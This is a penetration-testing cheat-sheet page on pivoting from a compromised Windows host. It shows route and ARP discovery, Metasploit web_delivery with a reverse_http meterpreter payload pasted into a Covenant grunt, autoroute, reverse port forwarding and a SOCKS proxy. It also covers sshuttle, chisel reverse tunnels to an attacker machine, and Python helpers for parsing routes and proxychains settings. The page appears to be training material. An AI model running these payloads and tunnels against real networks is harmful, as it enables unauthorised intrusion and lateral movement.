CSbyGB - Pentips

Pivoting

Metasploit

Check routes on a win machine

  • We need to see what other networks and hosts our target machine can reach

  • route print

    C:\Windows\system32>route print
    route print
    ===========================================================================
    Interface List
     12...08 00 27 ae c1 68 ......Intel(R) PRO/1000 MT Desktop Adapter
      1...........................Software Loopback Interface 1
    ===========================================================================
    
    IPv4 Route Table
    ===========================================================================
    Active Routes:
    Network Destination        Netmask          Gateway       Interface  Metric
              0.0.0.0          0.0.0.0     192.168.57.1        10.0.2.15     25
             10.0.2.0    255.255.255.0         On-link         10.0.2.15    281
            10.0.2.15  255.255.255.255         On-link         10.0.2.15    281
           10.0.2.255  255.255.255.255         On-link         10.0.2.15    281
            127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
            127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
      127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
            224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
            224.0.0.0        240.0.0.0         On-link         10.0.2.15    281
      255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
      255.255.255.255  255.255.255.255         On-link         10.0.2.15    281
    ===========================================================================
    Persistent Routes:
      None
    
    IPv6 Route Table
    ===========================================================================
    Active Routes:
     If Metric Network Destination      Gateway
      1    331 ::1/128                  On-link
     12    281 fe80::/64                On-link
     12    281 fe80::857:534f:3bb0:8fce/128
                                        On-link
      1    331 ff00::/8                 On-link
     12    281 ff00::/8                 On-link
    ===========================================================================
    Persistent Routes:
      None
  • arp -a

    Interface: 10.0.2.15 --- 0xc
    Internet Address      Physical Address      Type
    10.0.2.3              08-00-27-35-94-d3     dynamic   
    10.0.2.4              08-00-27-fc-72-e9     dynamic   
    10.0.2.5              08-00-27-7f-90-90     dynamic   
    10.0.2.8              08-00-27-1d-d2-98     dynamic   
    10.0.2.255            ff-ff-ff-ff-ff-ff     static    
    192.168.57.1          52-54-00-12-35-00     dynamic   
    224.0.0.22            01-00-5e-00-00-16     static    
    224.0.0.251           01-00-5e-00-00-fb     static    
    224.0.0.252           01-00-5e-00-00-fc     static    
    239.255.255.250       01-00-5e-7f-ff-fa     static    
    255.255.255.255       ff-ff-ff-ff-ff-ff     static    
  • Now that we have other interesting IPs, we can try to reach those new ones

  • We can run a port scan against one of these IPs from within the session

  • use auxiliary/scanner/portscan/tcp

  • set rhosts 10.0.2.5

  • set ports 445

  • run

    [+] 10.0.2.5:             - 10.0.2.5:445 - TCP OPEN
    [*] 10.0.2.5:             - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    We could of course have set more ports, which turns this module into a handy nmap-like scanner through the pivot.
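The route and ARP listings above are the raw material for choosing where to pivot next. As an added example (my code, not part of the original page and not a Metasploit module), the Python below parses `route print` and `arp -a` output, drops the loopback, multicast, broadcast and /32 host entries that tell you nothing new, and returns the subnets, default gateway and neighbours worth a look. The two sample outputs are constructed from the listings above, trimmed to the relevant rows.

```python
"""Pick pivot candidates out of Windows `route print` / `arp -a` output.
Added example, not code from the original page.  The two samples below are
constructed from the listings shown on the page (trimmed to the relevant rows)."""
import ipaddress
import re

ROUTE_PRINT = """\
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0     192.168.57.1        10.0.2.15     25
         10.0.2.0    255.255.255.0         On-link         10.0.2.15    281
        10.0.2.15  255.255.255.255         On-link         10.0.2.15    281
       10.0.2.255  255.255.255.255         On-link         10.0.2.15    281
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link         10.0.2.15    281
  255.255.255.255  255.255.255.255         On-link         10.0.2.15    281
===========================================================================
"""

ARP_A = """\
Interface: 10.0.2.15 --- 0xc
  Internet Address      Physical Address      Type
  10.0.2.3              08-00-27-35-94-d3     dynamic
  10.0.2.5              08-00-27-7f-90-90     dynamic
  10.0.2.255            ff-ff-ff-ff-ff-ff     static
  192.168.57.1          52-54-00-12-35-00     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# destination, netmask, gateway (an IP or "On-link"), interface, metric
ROUTE_RE = re.compile(rf"^\s*{IPV4}\s+{IPV4}\s+(\S+)\s+{IPV4}\s+(\d+)\s*$")
# address, dash-separated MAC, entry type
ARP_RE = re.compile(rf"^\s*{IPV4}\s+([0-9a-f]{{2}}(?:-[0-9a-f]{{2}}){{5}})\s+(dynamic|static)\s*$", re.I)


def parse_routes(text):
    """Return one dict per IPv4 route row; headers and separators are ignored."""
    routes = []
    for line in text.splitlines():
        m = ROUTE_RE.match(line)
        if not m:
            continue
        dest, mask, gateway, iface, metric = m.groups()
        routes.append({
            "network": ipaddress.ip_network(f"{dest}/{mask}", strict=False),
            "gateway": gateway, "interface": iface, "metric": int(metric),
        })
    return routes


def pivot_networks(routes):
    """Subnets reachable from the foothold that are worth scanning: the default
    route, /32 host routes, loopback and multicast are dropped."""
    keep = []
    for r in routes:
        net = r["network"]
        if net.prefixlen in (0, 32) or net.is_loopback or net.is_multicast:
            continue
        keep.append(str(net))
    return keep


def default_gateway(routes):
    """Gateway of the 0.0.0.0/0 route (None if absent).  A gateway that sits
    outside every on-link subnet, like 192.168.57.1 here, hints at a further
    segment behind the host."""
    for r in routes:
        if r["network"].prefixlen == 0:
            return r["gateway"]
    return None


def arp_neighbours(text):
    """Hosts the foothold recently exchanged frames with, minus broadcast and
    multicast noise, sorted numerically."""
    hosts = []
    for line in text.splitlines():
        m = ARP_RE.match(line)
        if not m:
            continue
        ip, mac, _kind = m.groups()
        addr = ipaddress.ip_address(ip)
        if addr.is_multicast or mac.lower() == "ff-ff-ff-ff-ff-ff":
            continue
        hosts.append(addr)
    return [str(h) for h in sorted(hosts)]


if __name__ == "__main__":
    routes = parse_routes(ROUTE_PRINT)
    print("subnets:", pivot_networks(routes))
    print("default gateway:", default_gateway(routes))
    print("neighbours:", arp_neighbours(ARP_A))
```

Feed it the real output captured from the session instead of the constants and the neighbour list becomes the `rhosts` you hand to the portscan module; the ARP cache is cheaper and quieter than a sweep because it only reports hosts the machine already talks to.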

Reverse port forwarding and Session Passing with Metasploit having initial shell on Covenant

  • Let's assume we already have a shell with Covenant, for instance

  • We generate a payload with Metasploit through web delivery (stealthier, because it can pass as HTTP traffic)

  • use exploit/multi/script/web_delivery

  • set target 2 (for powershell)

  • set payload windows/x64/meterpreter/reverse_http

  • set lhost to your attacking machine

  • set an lport

  • exploit -j

  • Now we can copy the payload and paste to our grunt in Covenant

  • Metasploit should now have opened a session

  • We can look at the interfaces with ipconfig to choose which network to route through

  • run autoroute -s 192.168.16.0/24

  • We can check it's been done using run autoroute -p

  • We can now set up a reverse port forward

  • portfwd add -R -p 1234 -l 443 -L ATTACKING-MACHINE-IP

  • We can check it's been done using portfwd

  • We can background our session with CTRL-Z

  • We will set up a SOCKS proxy: use auxiliary/server/socks4a

  • We need to check our port in /etc/proxychains4.conf

  • set srvport 9050

  • We can check our jobs using jobs

  • We can kill the web delivery job, which we no longer need: jobs -k ID-OF-JOB

  • We now need to create a listener on covenant that will interact with the port forward set previously: 1 192.168.3.28:443 0.0.0.0:1234 Reverse

  • BindAddress can stay at 0.0.0.0, BindPort should be 443, connectPort should be 1234 and connect address is the IP of our victim machine.

  • Using proxychains, we should now be able to reach the other machines in the network of the initial machine, which now has a route back to our attacking machine

sshuttle

Let's say you got a shell on a machine that has local access to another one (let's call it machine 2). sshuttle will let you reach machine 2 from your own network by acting as a proxy over the SSH connection.

sshuttle --listen 0.0.0.0 -e "ssh -i keyfile" -r user@IP-OF-YOUR-TARGET-MACHINE IP-OF-SUBNET-ACCESSIBLE-THROUGH-MACHINE2/24 -v
# example
sshuttle --listen 0.0.0.0 -e "ssh -i key" -r root@10.10.120.117 172.12.1.0/24 -v

Chisel

  • If you have a shell on a machine that has a port open only locally, you can forward that port to your own machine with chisel (this is port forwarding). In our example we want to forward port 445 of the target machine, which is only listening locally, so that we can interact with it from our Kali on our own port 445:

- On my kali `chisel server --reverse` (it is going to listen on port 8080)
- On the target `.\chisel.exe client KALI-IP:8080 R:445:127.0.0.1:445`
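The `R:445:127.0.0.1:445` argument is chisel's remote spec, and it is easy to get the two sides mixed up. As an added example (my code, not chisel's), the Python below decodes a remote the way chisel's README documents it (read right to left: remote-port, remote-host, local-port, local-host, with a trailing `socks` replacing the remote side) and states which side listens where. The `describe` helper and its `server`/`client` labels are mine, and IPv6 bracket syntax and the `stdio` remote are left out as assumptions of this example.

```python
"""Decode a chisel remote spec into who listens where.
Added example, not chisel's own code.  The precedence rules follow chisel's
README: fields are read right to left (remote-port, remote-host, local-port,
local-host); a final "socks" field replaces the remote side; local-host
defaults to 0.0.0.0, remote-host defaults to 0.0.0.0 (the peer's own host),
local-port defaults to remote-port (1080 for socks), protocol to tcp.
IPv6 brackets and the "stdio" remote are deliberately not handled here."""


def parse_remote(spec):
    """Return a dict describing a remote such as R:445:127.0.0.1:445."""
    reverse = spec.startswith("R:")
    body = spec[2:] if reverse else spec
    proto = "tcp"
    if "/" in body:                      # e.g. 1.1.1.1:53/udp
        body, proto = body.rsplit("/", 1)
    r = {"reverse": reverse, "socks": False, "proto": proto,
         "local_host": None, "local_port": None,
         "remote_host": None, "remote_port": None}
    parts = body.split(":")
    for i in range(len(parts) - 1, -1, -1):   # walk the fields right to left
        p = parts[i]
        if i == len(parts) - 1 and p == "socks":
            r["socks"] = True
            continue
        if p.isdigit() and 0 < int(p) < 65536:
            # first port seen is the remote port (unless socks); the last
            # port seen wins as the local port
            if not r["socks"] and r["remote_port"] is None:
                r["remote_port"] = int(p)
            r["local_port"] = int(p)
            continue
        if not p:
            raise ValueError(f"empty field in {spec!r}")
        # a host: the first one belongs to the remote side, the next to local
        if not r["socks"] and r["remote_host"] is None:
            r["remote_host"] = p
        else:
            r["local_host"] = p
    if r["socks"]:
        r["local_port"] = r["local_port"] or 1080
    elif r["remote_port"] is None:
        raise ValueError(f"missing port in {spec!r}")
    r["local_host"] = r["local_host"] or "0.0.0.0"
    if not r["socks"]:
        r["remote_host"] = r["remote_host"] or "0.0.0.0"
    return r


def describe(spec, server="kali", client="target"):
    """Plain-English rendering.  With R: the chisel server (our box) opens the
    listener and the client (the foothold) makes the onward connection;
    without R: the roles are swapped."""
    r = parse_remote(spec)
    listener, connector = (server, client) if r["reverse"] else (client, server)
    where = f"{r['local_host']}:{r['local_port']}"
    if r["socks"]:
        return (f"{listener} listens on {where} as a SOCKS5 proxy; "
                f"{connector} makes the outbound connections on its behalf")
    return (f"{listener} listens on {where}/{r['proto']}; each connection is "
            f"carried to {connector}, which connects to "
            f"{r['remote_host']}:{r['remote_port']}")


if __name__ == "__main__":
    for s in ("R:445:127.0.0.1:445", "R:1080:socks", "3000:example.com:80"):
        print(s, "->", describe(s))
```

For `R:445:127.0.0.1:445` the listener ends up on the Kali side, so make sure nothing there (a local Samba service, for instance) already holds port 445 before running `chisel server --reverse`, otherwise the remote will fail to bind.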

Pivoting with Chisel

  • From my kali chisel server --reverse

  • From the victim machine .\chisel.exe client IP-OF-KALI:8080 R:1080:socks

  • In your /etc/proxychains4.conf add this line: socks5 127.0.0.1 1080
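Both the Metasploit socks4a job (srvport 9050) and the chisel `R:1080:socks` pivot depend on /etc/proxychains4.conf pointing at the right listener, and the stock file already ships a `socks4 127.0.0.1 9050` entry meant for Tor. As an added example (my code, not part of the original page or of either project), the Python below parses the `[ProxyList]` section, checks whether your listener is in it, and rewrites the file so that it is the only active hop. `SAMPLE_CONF` is a constructed stand-in for the distribution default, and the function names are mine.

```python
"""Keep /etc/proxychains4.conf in step with the SOCKS listener just started:
Metasploit's socks4a job on srvport 9050, or chisel's R:1080:socks (SOCKS5).
Added example, not from the original page or either project.  SAMPLE_CONF is
a constructed stand-in for the distribution default file."""
import re

SAMPLE_CONF = """\
# proxychains.conf  VER 4.x
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# defaults set to "tor"
socks4  127.0.0.1 9050
"""

# type host port [user pass]
PROXY_RE = re.compile(r"^(http|socks4|socks5|raw)\s+(\S+)\s+(\d+)(?:\s+(\S+)\s+(\S+))?$")
CHAIN_MODES = ("strict_chain", "dynamic_chain", "random_chain", "round_robin_chain")


def _uncommented(line):
    """Text of a line with any '#' comment and surrounding whitespace removed."""
    return line.split("#", 1)[0].strip()


def chain_mode(conf):
    """Active chain mode, or None when unset (proxychains then behaves as strict_chain)."""
    for line in conf.splitlines():
        if _uncommented(line) in CHAIN_MODES:
            return _uncommented(line)
    return None


def parse_proxy_list(conf):
    """Active entries of [ProxyList], in order: (type, host, port, has_auth)."""
    entries, in_list = [], False
    for line in conf.splitlines():
        s = _uncommented(line)
        if not s:
            continue
        if s.startswith("["):
            in_list = s.lower() == "[proxylist]"
            continue
        m = PROXY_RE.match(s) if in_list else None
        if m:
            ptype, host, port, user, _pw = m.groups()
            entries.append((ptype, host, int(port), user is not None))
    return entries


def has_listener(conf, ptype, host, port):
    """True when our listener already appears as an active hop."""
    return any(e[:3] == (ptype, host, port) for e in parse_proxy_list(conf))


def ensure_listener(conf, ptype, host, port):
    """Return conf with our listener as the only active [ProxyList] entry.
    Other hops are commented out rather than chained: under strict_chain every
    hop must answer, so a leftover 'tor' entry on 9050 makes proxychains fail
    before it ever reaches a chisel listener on 1080.  Assumes [ProxyList] is
    the last section, as in the stock file, so an appended line lands in it."""
    out, in_list, found = [], False, False
    for line in conf.splitlines():
        s = _uncommented(line)
        if s.startswith("["):
            in_list = s.lower() == "[proxylist]"
        elif in_list and PROXY_RE.match(s):
            ptype_, host_, port_ = PROXY_RE.match(s).group(1, 2, 3)
            if (ptype_, host_, int(port_)) == (ptype, host, port):
                found = True
            else:
                line = f"# {line}  # disabled: not the current pivot listener"
        out.append(line)
    if not found:
        out.append(f"{ptype} {host} {port}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("chain mode:", chain_mode(SAMPLE_CONF))
    print("msf socks4a on 9050 present:", has_listener(SAMPLE_CONF, "socks4", "127.0.0.1", 9050))
    print(ensure_listener(SAMPLE_CONF, "socks5", "127.0.0.1", 1080))
```

With the Metasploit flow the stock entry already matches (srvport 9050 was chosen for exactly that reason), so `ensure_listener` returns the file unchanged; with chisel the type and port both differ, and the function comments the Tor line out before appending `socks5 127.0.0.1 1080`.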

Resources

You can check out examples of use of chisel in the chatterbox writeup or in the buffer overflow windows writeup.

Etat de l'art du pivoting réseau en 2019 | Orange Cyberdefense France (State of the art of network pivoting in 2019): an amazing resource about pivoting, but only in French; it can definitely be read using Google Translate.

TCM Security Academy - Practical Ethical Hacking - The Complete Course